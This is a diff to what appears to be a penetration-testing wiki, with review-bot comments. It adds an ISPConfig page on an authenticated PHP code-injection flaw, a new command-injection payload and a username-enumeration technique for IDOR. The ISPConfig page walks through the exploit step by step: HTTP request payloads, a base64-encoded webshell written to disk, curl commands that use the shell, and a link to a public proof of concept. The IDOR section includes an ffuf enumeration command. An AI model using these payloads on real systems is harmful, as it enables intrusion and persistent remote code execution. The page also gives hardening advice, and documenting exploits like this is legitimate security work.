1 change: 1 addition & 0 deletions src/SUMMARY.md
@@ -430,6 +430,7 @@
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
- [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md)
- [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md)
- [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md)
- [JBOSS](network-services-pentesting/pentesting-web/jboss.md)
- [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md)
- [Joomla](network-services-pentesting/pentesting-web/joomla.md)
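Review bot: the new SUMMARY entry titles the page `Ispconfig` while the page itself is headed `# ISPConfig` and the README link added in this same change reads `ISPConfig`; use the product's own capitalisation in all three places, i.e. `- [ISPConfig](network-services-pentesting/pentesting-web/ispconfig.md)`.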
1 change: 1 addition & 0 deletions src/network-services-pentesting/pentesting-web/README.md
@@ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
- [**Golang**](golang.md)
- [**GraphQL**](graphql.md)
- [**H2 - Java SQL database**](h2-java-sql-database.md)
- [**ISPConfig**](ispconfig.md)
- [**IIS tricks**](iis-internet-information-services.md)
- [**Microsoft SharePoint**](microsoft-sharepoint.md)
- [**JBOSS**](jboss.md)
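Review bot: the `ISPConfig` entry is inserted before `IIS tricks`, which breaks the alphabetical run from `H2` through `IIS` in this list; move it one line down, after the IIS entry (the `Microsoft SharePoint` line is already out of order, but the new line should not add to that).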
107 changes: 107 additions & 0 deletions src/network-services-pentesting/pentesting-web/ispconfig.md
@@ -0,0 +1,107 @@
# ISPConfig

{{#include ../../banners/hacktricks-training.md}}

## Overview

ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation.

Key default paths:
- Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx.
- Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed).

Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it:

```bash
ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001
```

## Language editor PHP code injection (CVE-2023-46818)

- Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1)
- Preconditions:
- Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor)
- Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini`
- Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

### Manual exploitation flow

1) Open/create a language file to obtain CSRF tokens

Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`.

2) Inject PHP via records[] and save

Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes:

```http
POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>
```

Out-of-band test (observe ICMP):

```http
records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>
```

3) Write files and drop a webshell

Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`):

```http
records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>
```

Then write a simple webshell using base64 to avoid bad characters in the POST body:

```http
records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>
```

Use it:

```bash
curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
```

If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.

### Python PoC

A ready-to-use exploit automates token handling and payload delivery:
- [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)

Example run:

```bash
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
```

### Hardening

- Upgrade to 3.2.11p1 or later
- Disable the language editor unless strictly needed:

```
admin_allow_langedit=no
```

- Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges
- Enforce strong authentication for the built-in `admin` account

## References

- [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/)
- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)

{{#include ../../banners/hacktricks-training.md}}
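Review bot: the hardening block containing `admin_allow_langedit=no` is an untagged fence with no indication of which file the line belongs in; the file is named earlier in the same page (`/usr/local/ispconfig/security/security_settings.ini`), so tag the fence as ```ini and repeat the path in the bullet so the hardening section can be read on its own. Two smaller points in the same file: step 1 of the manual flow says to send a first POST to initialise the form and obtain `csrf_id`/`csrf_key` but shows no request, so list its parameters (presumably the same `lang`, `module` and `file` fields used in the save request) so the flow can be followed without the PoC; and the sentence "References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below." is redundant with the References heading and can be dropped. A defensive reader would also benefit from one detection bullet that follows directly from the flow shown, e.g. alerting on new `.php` files appearing under the web-reachable `admin/` directory, next to the existing upgrade and privilege-dropping advice.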
3 changes: 3 additions & 0 deletions src/pentesting-web/command-injection.md
Expand Up @@ -19,6 +19,7 @@ ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
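Review bot: the new payload `ls%0abash%09-c%09"id"%0a` is only partly URL-encoded (the separators are `%0a`/`%09` while the quotes and command text are literal) and it uses lowercase `%0a` where the line directly above uses `%0A`; the other entries in this block are shown in raw form with the encoding noted in the comment, so either show the raw form (`ls<LF>bash<TAB>-c<TAB>"id"<LF>`) with a comment that `%0a` and `%09` are the encoded newline and tab, or encode the whole value consistently.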
@@ -170,5 +171,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
- [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection)
- [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
- [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
- [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)

{{#include ../banners/hacktricks-training.md}}
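Review bot: the last added reference title contains U+2011 non-breaking hyphens in `CVE‑2023‑46818`, so a plain-text search for `CVE-2023-46818` will not match it; replace them with ASCII hyphens. Also, the `PHP proc_open manual` link is added to the references with no body change in this diff that relies on it; if the page body does not already discuss proc_open, add the sentence that makes the link relevant, otherwise a reader cannot tell what it backs.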
22 changes: 22 additions & 0 deletions src/pentesting-web/idor.md
Expand Up @@ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do
done
```

---

### Error-response oracle for user/file enumeration

When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), subtle differences in error messages often create an oracle:

- Non-existent username → "User not found"
- Bad filename but valid extension → "File does not exist" (sometimes also lists available files)
- Bad extension → validation error

With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users:

```bash
ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \
-b 'PHPSESSID=<session-cookie>' \
-w /opt/SecLists/Usernames/Names/names.txt \
-fr 'User not found'
```

Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage.

---
## 2. Real-World Case Study – McHire Chatbot Platform (2025)

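Review bot: the new section explains the error-response oracle and how to enumerate with it but gives no remediation; a closing sentence stating that the endpoint should return one uniform error for every failure case (unknown user, missing file, bad extension) and should authorize `username` against the authenticated session rather than trusting the parameter would complete the section for the defensive reader. Minor: the section opens with its own `---` rule while the existing `---` before `## 2.` remains, giving two rules around one short section; one is enough.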
@@ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
* [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
{{#include ../banners/hacktricks-training.md}}
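Review bot: the same 0xdf Nocturnal write-up is added to three reference lists in this change under three different titles (`Root via ISPConfig language editor RCE`, `IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)`, `IDOR oracle → file theft`); one consistent title, with the page-specific angle in a short suffix, makes the citation easier to recognise across pages. Also, the added bullet here is followed directly by `{{#include ...}}` with no blank line between the list and the include, unlike `ispconfig.md` and `command-injection.md` in this same change.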